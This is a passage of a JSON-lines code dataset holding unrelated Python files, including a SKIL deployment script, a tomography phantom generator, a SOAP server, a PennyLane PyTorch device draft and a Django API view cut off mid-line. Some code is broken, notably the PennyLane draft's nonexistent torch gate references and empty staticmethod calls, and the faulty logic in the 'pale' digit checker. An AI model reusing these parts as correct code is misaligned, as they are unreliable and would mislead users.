API class\napi_instance_mh = skil_client.DefaultApi(api_client=api_client_mh)\n\n# authenticate\npp = pprint.PrettyPrinter(indent=4)\ntry:\n print(\"Authenticating with SKIL API...\")\n credentials = skil_client.Credentials(user_id=\"admin\", password=\"admin\") # Update this with the ID and password you're using for your SKIL server\n token = api_instance.login(credentials)\n pp.pprint(token)\n # add credentials to config\n config.api_key['authorization'] = token.token\n config.api_key_prefix['authorization'] = \"Bearer\"\n # for model history\n config_mh.api_key['authorization'] = token.token\n config_mh.api_key_prefix['authorization'] = \"Bearer\"\nexcept ApiException as e:\n print(\"Exception when calling DefaultApi->login: %s\\n\" % e)\n\nprint(\"Uploading model, please wait...\")\nmodelFile = \"/model.pb\"\nuploads = api_instance.upload(file=modelFile)\npp.pprint(uploads)\n\nmodel_file_path = \"file://\" + uploads.file_upload_response_list[0].path\npp.pprint(model_file_path)\n\ndeployment_name = \"mnist\"\ncreate_deployment_request = CreateDeploymentRequest(deployment_name)\ndeployment_response = api_instance.deployment_create(create_deployment_request)\n\npp.pprint(deployment_response)\n\nmodel_name = \"tf_model_mnist\"\nuris = [\"{}/model/{}/default\".format(deployment_name, model_name),\n \"{}/model/{}/v1\".format(deployment_name, model_name)]\n\ndeploy_model_request = ImportModelRequest(model_name,\n 1, \n file_location=model_file_path,\n model_type=\"model\",\n uri=uris,\n input_names=[\"input_node\", \"keep_prob_input\"], \n output_names=[\"output_node\"])\n\nmodel_deployment_response = api_instance.deploy_model(deployment_response.id, deploy_model_request)\npp.pprint(model_deployment_response)\n\nmodel_state_change_response = api_instance.model_state_change(deployment_response.id,\n model_deployment_response.id,\n SetState(\"start\"))\npp.pprint(model_state_change_response)\n\nimport time\n\n# Checking if the model is already started\nprint(\"\\nStart serving model...\")\nwhile True:\n time.sleep(5)\n \n # Query the model state\n model_state = api_instance.model_state_change(deployment_response.id, \n model_deployment_response.id, \n SetState(\"start\")).state\n \n if model_state == \"started\":\n print(\"Model server started successfully!\")\n break\n else:\n print(\"wait...\")\n","sub_path":"Docker-deployment/docker/deploy_model.py","file_name":"deploy_model.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"631916194","text":"# from torch import im\n\n\ndef weights_init(module):\n classname = module.__class__.__name__\n if classname.find('Conv') != -1:\n module.weight.data.normal_(0.0, 0.1)\n elif classname.find('Linear') != -1:\n module.weight.data.normal_(0.0, 0.1)\n module.bias.data.fill_(0.0)\n\n\ndef model_weights_init(model):\n for module in model.modules():\n weights_init(module)\n\n\n","sub_path":"LearnDistance/with_augmentation/helperFunctions.py","file_name":"helperFunctions.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"522152036","text":"def pale(n):\n n_string = str(n) #convert the provided number into a string\n fourdigits = len(n_string) == 4 # with the string version of the input, determine if the value indeed has 4 digits\n rem = n % 10 #use modulo to place the last digit into a another formula\n divisble = rem % 4 == 0 and rem != 0 #determine if the last digit of the input is divisble by 4 and not 0.\n n = int(n / 10)\n rem1 = n % 10\n n = int(n / 10)\n rem2 = n % 10\n n = int(n / 10)\n rem3 = n % 10\n n = int(n / 10)\n rem4 = n % 10 # repeatedly separete reach four digits one by one\n threethree = (rem and rem1) or (rem1 and rem2) or (rem2 and rem4) or (rem3 and rem4) == 3 #verfify if any consecutive digits each equal to 3\n pale_verficiation = (threethree != divisble == fourdigits) or (fourdigits == threethree != divisble) #determine if the results will equal to a pale or not\n return pale_verficiation #output the determination\n","sub_path":"Pale_Function.py","file_name":"Pale_Function.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"329966968","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 11 18:03:26 2020\n\n@author: milly\n\"\"\"\n\nimport numpy as np\nfrom tomophantom import TomoP2D \nfrom tomophantom.TomoP2D import Objects2D\nimport astra\nimport os\n\nnum_gen = 1000\n\n#make this automatic\ntrainset = 3\nmin_obs = 5\nmax_obs = 30\n\nsinogram_folder = \"sinograms\"\nphantom_folder = \"phantoms\"\n\ntrainset_list = list(filter(lambda x: \"sinograms\" in x, os.listdir(os.getcwd())))\ntrainset_list = list(map(lambda x: int(x.split(\"_\")[-1]), trainset_list))\nwhile trainset in trainset_list:\n trainset += 1\n \nroot_dir = os.getcwd()\n\nsinogram_folder = os.path.join(root_dir, sinogram_folder + \"_{}_{}_{}\".format(min_obs, max_obs, trainset))\nphantoms_folder = os.path.join(root_dir, phantom_folder + \"_{}_{}_{}\".format(min_obs, max_obs, trainset))\nos.mkdir(sinogram_folder)\nos.mkdir(phantoms_folder)\n\nsino_name = \"sino_{}\"\nphantom_name = \"ground_{}\"\n\n#keeps the generated objects within a circle with a diameter 90% of the \nwidth = 0.9\n\nnum_objects = np.random.randint(min_obs, max_obs)\nob_list = np.empty(num_objects, dtype=dict)\n\nfor i in range(num_gen):\n print(i)\n for ob_index in range(num_objects):\n \n density = np.random.rand()\n shape = [Objects2D.ELLIPSE, Objects2D.RECTANGLE][np.random.randint(0,2)]\n \n if shape == Objects2D.ELLIPSE:\n R = width\n x = np.random.rand() * 2 - 1\n y = np.random.rand() * 2 - 1\n while x**2 + y**2 > R ** 2:\n x = np.random.rand() * 2 - 1\n y = np.random.rand() * 2 - 1\n max_length = R - (x**2 + y**2) ** 0.5\n long_length = np.random.rand() * max_length\n short_length = np.random.rand() * long_length\n \n if shape == Objects2D.RECTANGLE:\n R = width/2\n x = np.random.rand() * 2\n y = np.random.rand() * 2\n while x**2 + y**2 > R ** 2:\n x = np.random.rand() * 2\n y = np.random.rand() * 2\n max_length = R - (x**2 + y**2) ** 0.5\n max_length *= 4/(2**0.5)\n long_length = np.random.rand() * max_length\n short_length = np.random.rand() * long_length\n \n rot = np.random.randint(0, 360)\n ob = {'Obj': shape,\n 'C0' : density,\n 'x0' : x,\n 'y0' : y,\n 'a' : long_length,\n 'b' : short_length,\n 'phi': rot}\n \n ob_list[ob_index] = ob\n \n #make these choices\n phantom = TomoP2D.Object(1499, ob_list)\n \n vol_geom = astra.creators.create_vol_geom(1499, 1499, -256, 256, -256, 256)\n proj_geom = astra.creators.create_proj_geom('parallel',1, \n 512, np.linspace(0, np.pi, 512, False))\n proj_id = astra.create_projector(\"cuda\",proj_geom,vol_geom)\n vol_geom_rec = astra.create_vol_geom(512,512)\n sino_id, sinogram = astra.create_sino(phantom,proj_id, gpuIndex=1)\n \n np.save(os.path.join(phantoms_folder, phantom_name.format(i)), phantom)\n np.save(os.path.join(sinogram_folder, sino_name.format(i)), sinogram)\n","sub_path":"new_rand_set.py","file_name":"new_rand_set.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"406078987","text":"from __future__ import unicode_literals\n\nfrom re_scan import Scanner\n\n\nscanner = Scanner([\n ('bold', r'\\*\\*'),\n ('link_special', r'\\[\\[(?P.*?)\\|(?P.*?)\\]\\]'),\n ('link', r'\\[\\[(.*?)\\]\\]'),\n ('underline', r'_'),\n])\n\ninput_text = 'Hello **World**! [[Stuff|extra]] _[[Stuff]]_.'\n\nfor token, match in scanner.scan_with_holes(input_text):\n if token is None:\n print('hole', match)\n else:\n print('token', (token, match.groups(),\n match.groupdict(), match.group()))\n","sub_path":"examples/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"158526209","text":"'''\n#40 Combination Sum II\nGiven a collection of candidate numbers (C) and a target number (T), find all unique combinations in C where the candidate numbers sums to T.\n\nEach number in C may only be used once in the combination.\n\nNote:\nAll numbers (including target) will be positive integers.\nThe solution set must not contain duplicate combinations.\nFor example, given candidate set [10, 1, 2, 7, 6, 1, 5] and target 8, \nA solution set is: \n[\n [1, 7],\n [1, 2, 5],\n [2, 6],\n [1, 1, 6]\n]\n'''\nclass Solution(object):\n def combinationSum2(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n res = list()\n if len(candidates) == 0:\n return res\n candidates.sort()\n i = 0\n while i < len(candidates):\n if i > 0 and candidates[i] == candidates[i-1]: #skip the duplicate one\n i += 1\n continue\n candi = candidates[i]\n if candi > target:\n break\n if candi == target:\n temp = [candi]\n res.append(temp)\n break\n \n temp_list =list()\n temp_list.append(candi)\n temp_target = target - candi\n temp_res = self.combinationSum2(candidates[i+1:],temp_target)\n for item in temp_res:\n temp = temp_list + item\n res.append(temp)\n i += 1\n return res\n ","sub_path":"Algorithms/N40-Combination Sum2.py","file_name":"N40-Combination Sum2.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"219877633","text":"import codecs\n\nfile = codecs.open(\"TDK_kelimeler_anlamlar_ceviriler.txt\", \"r\")\n\nkac_tek_kelime = 0\n\ntr_kelimeler = []\n\nfor satir in file:\n \n parcali_satir = satir.split(\";;\")\n tr_kelime = parcali_satir[0]\n en_kelime = parcali_satir[2]\n tr_anlami = parcali_satir[1]\n \n tr_kelime_lower = tr_kelime.lower()\n en_kelime_lower = en_kelime.lower()\n \n def non_turkish(_nt_string):\n \n return _nt_string.replace(\"ç\", \"c\").replace(\"ğ\", \"g\").replace(\"ş\",\"s\").replace(\"ü\",\"u\").replace(\"ö\",\"o\").replace(\"ı\",\"i\").replace(\"â\",\"a\").replace(\"î\",\"i\").replace(\"û\",\"u\").replace(\"\\r\",\"\").replace(\"\\n\",\"\")\n \n tr_kelime_lower_edited = non_turkish(tr_kelime_lower)\n en_kelime_lower_edited = non_turkish(en_kelime_lower)\n \n \n \n if \" \" in en_kelime:\n \n continue\n \n else:\n \n if tr_kelime_lower_edited == en_kelime_lower_edited:\n \n continue\n \n else:\n \n if \"\\\"\" in en_kelime:\n \n continue\n \n else:\n \n if not \"if\" == en_kelime[:2]:\n \n if not \"don't\" == en_kelime[:5]:\n \n if not \"does'\" == en_kelime[:5]:\n \n satir_kelime_anlam_en = \"%s;;%s;;%s\" % (tr_kelime, tr_anlami, en_kelime)\n satir_kelime_anlam_en = satir_kelime_anlam_en.replace(\"\\r\",\"\").replace(\"\\n\",\"\")\n \n if tr_kelime not in tr_kelimeler: \n \n kac_tek_kelime += 1\n \n tr_kelimeler.append(tr_kelime)\n \n print(satir_kelime_anlam_en, file=codecs.open(\"TDK_tek_kelimeler_anlamlar_cevriler.txt\", \"a\"))","sub_path":"apptrogren/just_one_words.py","file_name":"just_one_words.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"626524369","text":"# -*- coding: utf-8 -*-\n\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport time\nimport os\nimport sys\n\nif sys.version_info[0] == 3:\n import urllib.request\nelse:\n import urllib\n# http://stackoverflow.com/questions/17960942/attributeerror-module-object-has-no-attribute-urlretrieve\n\n\nfrom ..drivers import Oscillo, Spectrum\nfrom .oscillo_widget import OscilloWidget\nfrom .spectrum_widget import SpectrumWidget\nfrom .connect_widget import ConnectWidget\nfrom koheron import connect\n\nclass WelcomeWidget(QtGui.QWidget):\n \"\"\" This widget allows to connect to one of the available drivers.\n \"\"\"\n def __init__(self, parent, ip_path):\n super(WelcomeWidget, self).__init__()\n\n self.parent = parent\n self.app_list = self.parent.app_list\n self.instrument_list = [''] * len(self.app_list)\n\n self.ip_path = ip_path\n self.opened = True\n self.select_opened = True\n\n # Define layouts\n self.lay = QtGui.QHBoxLayout()\n self.left_layout = QtGui.QVBoxLayout()\n self.right_layout = QtGui.QVBoxLayout()\n\n # Connection (ip address and password)\n self.connect_layout = QtGui.QVBoxLayout()\n self.connect_widget = ConnectWidget(self, self.ip_path)\n self.connect_layout.addWidget(self.connect_widget)\n\n # Select between drivers\n self.drivers_layout = QtGui.QVBoxLayout()\n\n self.app_buttons = []\n for i, app in enumerate(self.instrument_list):\n self.app_buttons.append(self.set_button(''))\n self.drivers_layout.addWidget(self.app_buttons[i], 1, QtCore.Qt.AlignCenter)\n def make_callback(i):\n return lambda : self.app_onclick(i)\n self.app_buttons[i].clicked.connect(make_callback(i))\n self.update_buttons()\n\n # Right layout\n self.right_layout.addLayout(self.connect_layout)\n self.right_layout.addLayout(self.drivers_layout)\n self.right_layout.addStretch(1)\n self.right_frame = QtGui.QFrame(self)\n self.right_frame.setFrameShape(QtGui.QFrame.StyledPanel)\n self.right_frame.setLayout(self.right_layout)\n\n # Add layouts to main layout\n self.lay.addLayout(self.left_layout, 1)\n self.lay.addWidget(self.right_frame)\n self.setLayout(self.lay)\n\n def update(self):\n pass\n\n def set_button(self, name):\n button = QtGui.QPushButton(name)\n button.setStyleSheet('QPushButton {color: green;}')\n button.setFixedWidth(200)\n button.setFixedHeight(150)\n return button\n\n def update_buttons(self):\n for i, button in enumerate(self.app_buttons):\n button.setText(self.parent.app_list[i].capitalize() +\n (' not available ' if (self.instrument_list[i] == '') else ''))\n\n def app_onclick(self, app_idx):\n app = self.app_list[app_idx]\n instrument = self.instrument_list[app_idx]\n if instrument != '':\n QtGui.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))\n self.connect_widget.client = connect(self.connect_widget.host, name=instrument)\n driver = globals()[app.capitalize()](self.connect_widget.client)\n driver.init()\n QtGui.QApplication.restoreOverrideCursor()\n index = self.parent.stacked_widget.addWidget(globals()[app.capitalize()+'Widget'](driver, self.parent))\n self.parent.stacked_widget.setCurrentIndex(index)\n","sub_path":"ldk/gui/welcome_widget.py","file_name":"welcome_widget.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"522466984","text":"import logging\r\nimport inspect\r\nimport os\r\nimport functools\r\nimport time\r\n\r\n\r\nclass EndOfNameFilter(logging.Filter):\r\n def filter(self, record):\r\n record.trunc_name = record.name[-35:]\r\n return True\r\n\r\n\r\ndef get_logger(name=None, logging_format=None):\r\n if not logging_format:\r\n json_logging_format = \"\"\"{\"class_name\": \"%(name)s\", \"time\": \"%(asctime)s\", \"level\": \"%(levelname)s\", \"message\": \"%(message)s\"}\"\"\"\r\n logging_format = (\r\n \"%(trunc_name)35.35s - %(asctime)-15s - %(levelname)5.5s: %(message)s\"\r\n )\r\n if not name:\r\n name = os.path.basename(inspect.stack()[1].filename)\r\n logger = logging.getLogger(name)\r\n if not logger.handlers:\r\n sh = logging.StreamHandler()\r\n sh.setFormatter(logging.Formatter(logging_format))\r\n logger.addHandler(sh)\r\n sh.addFilter(EndOfNameFilter())\r\n logger.setLevel(logging.INFO)\r\n logger.propagate = False\r\n return logger\r\n\r\n\r\ndef logger_wrapper(func):\r\n @functools.wraps(func)\r\n def wrapped(*args, **kwargs):\r\n if hasattr(func, \"__self__\"):\r\n if func.__self__.logger_level != \"off\":\r\n func.__self__.logger.debug(\r\n \"{func.__qualname__!s} called with arguments: {a}, and kwargs: {k}\".format(\r\n func=func,\r\n a=\", \".join([str(a) for a in args]),\r\n k=\", \".join(kwargs),\r\n )\r\n )\r\n time0 = time.time()\r\n func_out = func(*args, **kwargs)\r\n func.__self__.logger.debug(\"Function returned %s\", func_out)\r\n func.__self__.logger.debug(\r\n \"Took %ss to execute\", round(time.time() - time0, 3)\r\n )\r\n return func_out\r\n else:\r\n return func(*args, **kwargs)\r\n else:\r\n return func(*args, **kwargs)\r\n\r\n return wrapped\r\n\r\n\r\nclass test:\r\n def __init__(self, logger):\r\n self.logger = logger\r\n self.logger_level = \"DEBUG\"\r\n self.debug = True\r\n if self.debug:\r\n self.wrap_debug()\r\n\r\n def wrap_debug(self):\r\n for k in self.__dir__():\r\n v = getattr(self, k)\r\n if callable(v) and hasattr(v, \"__self__\"): # only bound methods\r\n setattr(self, k, logger_wrapper(v))\r\n\r\n def poop(self, h):\r\n time.sleep(1)\r\n return h + 1\r\n","sub_path":"src/fast_krig/_log/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"436854734","text":"import numpy as np\nfrom pennylane.operation import DiagonalOperation\nfrom . import torch_ops\nfrom . import DefaultQubit\nfrom pytorch import torch\n\n#code to check the pytorch version\n\n\n#Made some changes, make it correct.\nclass DefaultQubitTorch(DefaultQubit):\n \"\"\"Simulator plugin based on ``\"default.qubit\"``, written using PyTorch.\n\n **Short name:** ``default.qubit.torch``\n\n This device provides a pure-state qubit simulator written using PyTorch.\n As a result, it supports classical backpropagation as a means to compute the Jacobian. This can\n be faster than the parameter-shift rule for analytic quantum gradients\n when the number of parameters to be optimized is large.\n \n #Write the crct installation of Pytorch, current one is just dummy\n To use this device, you will need to install Pytorch:\n\n .. code-block:: console\n\n pip install pytoch \n\n **Example**\n\n The ``default.qubit.torch`` is designed to be used with end-to-end classical backpropagation\n (``diff_method=\"backprop\"``) with the PyTorch interface. This is the default method\n of differentiation when creating a QNode with this device.\n\n Using this method, the created QNode is a 'white-box', and is\n tightly integrated with your TensorFlow computation:\n\n >>> dev = qml.device(\"default.qubit.tf\", wires=1)\n >>> @qml.qnode(dev, interface=\"tf\", diff_method=\"backprop\")\n ... def circuit(x):\n ... qml.RX(x[1], wires=0)\n ... qml.Rot(x[0], x[1], x[2], wires=0)\n ... return qml.expval(qml.PauliZ(0))\n >>> weights = tf.Variable([0.2, 0.5, 0.1])\n >>> with tf.GradientTape() as tape:\n ... res = circuit(weights)\n >>> print(tape.gradient(res, weights))\n tf.Tensor([-2.2526717e-01 -1.0086454e+00 1.3877788e-17], shape=(3,), dtype=float32)\n\n Autograph mode will also work when using classical backpropagation:\n\n >>> @tf.function\n ... def cost(weights):\n ... return tf.reduce_sum(circuit(weights)**3) - 1\n >>> with tf.GradientTape() as tape:\n ... res = cost(weights)\n >>> print(tape.gradient(res, weights))\n tf.Tensor([-3.5471588e-01 -1.5882589e+00 3.4694470e-17], shape=(3,), dtype=float32)\n\n There are a couple of things to keep in mind when using the ``\"backprop\"``\n differentiation method for QNodes:\n\n * You must use the ``\"tf\"`` interface for classical backpropagation, as TensorFlow is\n used as the device backend.\n\n * Only exact expectation values, variances, and probabilities are differentiable.\n When instantiating the device with ``analytic=False``, differentiating QNode\n outputs will result in ``None``.\n\n\n If you wish to use a different machine-learning interface, or prefer to calculate quantum\n gradients using the ``parameter-shift`` or ``finite-diff`` differentiation methods,\n consider using the ``default.qubit`` device instead.\n\n\n Args:\n wires (int, Iterable[Number, str]): Number of subsystems represented by the device,\n or iterable that contains unique labels for the subsystems as numbers (i.e., ``[-1, 0, 2]``)\n or strings (``['ancilla', 'q1', 'q2']``). Default 1 if not specified.\n\n shots (None, int): How many times the circuit should be evaluated (or sampled) to estimate\n the expectation values. Defaults to ``None`` if not specified, which means\n that the device returns analytical results.\n If ``shots > 0`` is used, the ``diff_method=\"backprop\"``\n QNode differentiation method is not supported and it is recommended to consider\n switching device to ``default.qubit`` and using ``diff_method=\"parameter-shift\"``.\n \"\"\"\n\n name = \"Default qubit (PyTorch) Pennylane plugin\"\n short_name = \"default.qubit.torch\"\n pennylane_requires = '2'\n version = '0.0.1'\n author = 'Abhinav M Hari and Daniel Wang'\n\n parametric_ops = {\n \"PhaseShift\": torch_ops.PhaseShift,\n \"ControlledPhaseShift\": torch_ops.ControlledPhaseShift,\n \"RX\": torch.RX,\n \"RY\": torch.RY,\n \"RZ\": torch.RZ,\n \"Rot\": torch.Rot,\n \"MultiRZ\": torch.MultiRZ,\n \"CRX\": torch.CRX,\n \"CRY\": torch.CRY,\n \"CRZ\": torch.CRZ,\n \"CRot\": torch.CRot,\n \"SingleExcitation\": torch.SingleExcitation,\n \"SingleExcitationPlus\": torch.SingleExcitationPlus,\n \"SingleExcitationMinus\": torch.SingleExcitationMinus,\n \"DoubleExcitation\": torch.DoubleExcitation,\n \"DoubleExcitationPlus\": torch.DoubleExcitationPlus,\n \"DoubleExcitationMinus\": torch.DoubleExcitationMinus,\n \n }\n\n C_DTYPE = torch.complex128\n R_DTYPE = torch.float64\n #_asarray confusion, not sure\n _asarray = staticmethod(torch.tensor)\n _dot = staticmethod(lambda x, y: torch.tensordot(x, y, dim=1))\n _abs = staticmethod(torch.abs)\n #find alternative for tf.reduce_sum, or create one, \n _reduce_sum = staticmethod()\n _reshape = staticmethod(torch.reshape)\n _flatten = staticmethod(lambda tensor: torch.reshape(tensor, [-1])) #not sure\n _gather = staticmethod(torch.gather)\n _einsum = staticmethod(torch.einsum)\n _cast = staticmethod(torch.tensor) #also check the torch.to function\n _transpose = staticmethod(torch.transpose)\n _tensordot = staticmethod(torch.tensordot)\n _conj = staticmethod(torch.conj)\n _imag = staticmethod(torch.imag)\n _roll = staticmethod(torch.roll) \n _stack = staticmethod(torch.stack) #check if it is same as tf.stack)\n\n #maybe a extra static method for _asarray like in default_quibt_tf.py\n\n #special apply method\n @staticmethod\n def __init__(self, shots=1024, hardware_options=None):\n super().__init__(wires=24, shots=shots, analytic=False)\n self.hardware_options = hardware_options\n\n\n @classmethod\n def capabilities(cls):\n capabilities = super().capabilities().copy()\n capabilities.update(\n passthru_interface=\"torch\",\n supports_reversible_diff=False\n )\n return capabilities\n\n @staticmethod\n #another static method for _scatter. Don't know what to do\n\n def _get_unitary_matrix(self, unitary):\n \"\"\"Return the matrix representing a unitary operation.\n\n Args:\n unitary (~.Operation): a PennyLane unitary operation\n\n Returns:\n torch.tensor[complex] or array[complex]: Returns a 2D matrix representation of\n the unitary in the computational basis, or in the case of a diagonal unitary,\n a 1D array representing the matrix diagonal. For non-parametric unitaries,\n the return type will be a ``np.ndarray``. For parametric unitaries, a ``torch.tensor``\n object will be returned.\n \"\"\"\n op_name = unitary.name.split(\".inv\")[0]\n\n if op_name in self.parametric_ops:\n if op_name == \"MultiRz\":\n mat = self.parametric_ops[op_name](*unitary.parameters, len(unitary.wires))\n else:\n mat = self.parametric_ops[op_name](*unitary.parameters)\n\n if unitary.inverse:\n mat = self._transpose(self._conj(mat))\n\n return mat\n\n if isinstance(unitary, DiagonalOperation):\n return unitary.eigvals\n\n return unitary.matrix\n","sub_path":"pennylane/devices/default_qubit_torch.py","file_name":"default_qubit_torch.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"419998526","text":"from pysimplesoap.server import SoapDispatcher, SOAPHandler, WSGISOAPHandler\nimport logging\nimport const\nfrom BaseHTTPServer import HTTPServer\ndispatcher = SoapDispatcher(\n'TransServer',\nlocation = \"http://%s:8050/\" % const.TARGET_IP,\naction = 'http://%s:8050/' % const.TARGET_IP, # SOAPAction\nnamespace = \"http://example.com/sample.wsdl\", prefix=\"ns0\",\ntrace = True,\nns = True)\n\ndef on():\n return \"on\"\ndef off():\n return \"off\"\n\ndef status():\n return \"1024\"\n\n# register the user function\n\ndispatcher.register_function('on', on,\n args={},\n returns={'result': str} \n )\n\ndispatcher.register_function('off', off,\n args={},\n returns={'result': str} \n )\n\ndispatcher.register_function('status', status,\n args={},\n returns={'humidity': str} \n )\n\nlogging.info(\"Starting server...\")\nhttpd = HTTPServer((\"\", 8050),SOAPHandler)\nhttpd.dispatcher = dispatcher\nhttpd.serve_forever()\n\n","sub_path":"http_server_soap.py","file_name":"http_server_soap.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"8507460","text":"import ride, car, readFile, router\r\n\r\n# --------------------------------------------\r\n# Input File with Rides\r\n\r\ninputFile = 'test.in' #'b_should_be_easy.in'\r\n\r\nrides = readFile.getRides(inputFile)\r\nparameters = readFile.getParameters(inputFile)\r\n\r\nRouter = router.Router()\r\n\r\ncarList = []\r\n\r\nfor i in range (parameters[\"vehicles\"]):\r\n carList.append (car.Car(i))\r\n print(carList[len(carList)-1].id)\r\n\r\nprint(\"List populated\")\r\n\r\nfor j in range (parameters[\"steps\"]):\r\n for current_car in carList:\r\n if (current_car.carActive):\r\n current_car.moveCar()\r\n\r\n for current_ride in rides:\r\n print(\"ride_loop\")\r\n if (not current_ride.assigned()):\r\n Router.assignCar(current_ride, carList)\r\n\r\nfor vehicle in carList:\r\n print (current_car.currentLocationX)\r\n print (current_car.currentLocationY)\r\n print (\"\")\r\n\r\n# Create rides in for loop\r\n# Store in List\r\n\r\n# Loop through each ride, Loop through available cars\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"187420230","text":"import json\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport math\nimport time\nimport argparse\n\ndef ROC_Data(T0, Tf, N, stat):\n\n with open(\"all_dir/run_uniques/essentials.json\", \"r\") as f:\n essentials = json.load(f)\n AFG_PAIR = essentials[\"essentials\"][6]\n trials = essentials[\"essentials\"][7]\n \n with open(\"all_dir/Merged_jsons/Merged_Peaks.json\", \"r\") as f:\n RHO_MOD = json.load(f)\n\n PSPACE_LEN=len(AFG_PAIR)\n\n # Stats per threshold\n Detection_Prob = []\n New_False_Prob = []\n\n #sets current threshold value\n for thrshld in np.linspace(T0,Tf,N):\n\n # Detection/ False Alarm probability counters\n Detect_count = 0\n False_count = 0\n\n #loops from trial/ parameter space pairs \n for i in range(trials):\n\n # Detection Probability\n Max_FG_ij = max(RHO_MOD[str(i)][1][stat]) # max of onsources per trial\n if Max_FG_ij > thrshld:\n Detect_count += 1\n\n for j in range(PSPACE_LEN):\n\n RM_ij=np.array(RHO_MOD[str(i)][0][stat][j])\n\n # False Alarm probability\n falses_ij = len(RM_ij[RM_ij > thrshld])\n False_count += falses_ij\n\n # Detection/False Alarm probability stats\n Detect_stat = Detect_count / trials\n False_stat = False_count / (len(RHO_MOD[str(i)][0][stat][0]) * PSPACE_LEN * trials)\n\n # Appending stat per threshold\n Detection_Prob.append(Detect_stat)\n New_False_Prob.append(False_stat)\n \n return(Detection_Prob, New_False_Prob)\n\ndef ROC_Curve(N, outputfile=\"ROC_test\"):\n \n with open(\"all_dir/run_uniques/essentials.json\", \"r\") as f:\n essentials = json.load(f)\n stat_list = essentials[\"essentials\"][8]\n\n \n with open(\"all_dir/Merged_jsons/Merged_thresholds.json\", \"r\") as f:\n Thresholds = json.load(f)\n \n tempn = len(Thresholds)\n \n for s in range(tempn):\n \n thresholds = Thresholds[str(s)]\n\n Detection_Prob, New_False_Prob = ROC_Data(min(thresholds), max(thresholds), N, s)\n plt.plot(New_False_Prob, Detection_Prob, label=stat_list[s])\n\n plt.xlabel(\"New_False_Probs\")\n plt.ylabel(\"Detection_Probs\")\n plt.title(\"ROC Curve:N={}\".format(N))\n plt.legend()\n plt.savefig(\"all_dir/plots/{}.png\".format(outputfile))\n\n# def ROC_Curve(N, outputfile=\"ROC_test\"):\n\nif __name__==\"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--N', type=int)\n parser.add_argument('--outputfile', nargs='?', const=1, type=str, default=\"ROC_test\")\n args = parser.parse_args()\n\n ROC_Curve(args.N,args.outputfile)\n","sub_path":"Statistic_Analysis/ROC_Curve.py","file_name":"ROC_Curve.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"292935650","text":"\"\"\"\r\nThe view layer of the API, handle string beautify and stuff\r\n\"\"\"\r\n\r\nimport datetime\r\nimport logging\r\nimport time\r\nimport os\r\nfrom django.http import HttpResponse, JsonResponse\r\nfrom .utils import LookupNotFoundError, InvalidDateError\r\nfrom .parse import parse_merchandise, parse_retail\r\nfrom .crocs import cross_origin\r\nfrom .models import Merchandise, Retail\r\n\r\n# get the current date\r\ncurrent_date = time.strftime(\"%Y-%m-%d\")\r\ncurrent_log_file = \"{}.log\".format(current_date)\r\n\r\n# header to add to the start of log file\r\nlog_header = \"Australian Statistics API\\nLog file for date: {}\\nDeveloper Team: Eleven51\\n\\n\".format(current_date)\r\n\r\n# add header if current date's log file does not exist or is empty\r\nif not os.path.isfile(current_log_file) or os.stat(current_log_file).st_size==0:\r\n file = open(current_log_file, 'w+')\r\n file.write(log_header)\r\n file.close()\r\n\r\n# configure logging formatting\r\nlogging.basicConfig(filename=\"{}.log\".format(current_date), level=logging.DEBUG, format=\"%(asctime)s: %(levelname)s: %(message)s\")\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\n@cross_origin\r\ndef index(request):\r\n \"\"\"\r\n # Index route, only echo the request\r\n :param request: http request\r\n :return: http response\r\n \"\"\"\r\n return HttpResponse('This is the API end point v3. Request is:' + str(request))\r\n\r\n\r\n@cross_origin\r\ndef show_merchandise_data(request, categories, states=\"Total\"):\r\n \"\"\"\r\n get the request, return merchandise data\r\n :param request: contain date\r\n :param categories: Categories string\r\n :param states: str, List of states\r\n :return: JSON of merch data\r\n \"\"\"\r\n\r\n # begin timer and log request\r\n start_time = time.time()\r\n logger.info(\"New API request: {}\".format(request.get_full_path()))\r\n\r\n start_date = request.GET.get('startDate')\r\n end_date = request.GET.get('endDate')\r\n\r\n # string to list\r\n categories_list = categories.split(',')\r\n states_list = states.split(',')\r\n\r\n try:\r\n merch = Merchandise(categories_list, states_list, start_date, end_date)\r\n except (LookupNotFoundError, InvalidDateError) as error:\r\n logger.info(\"HTTP 404 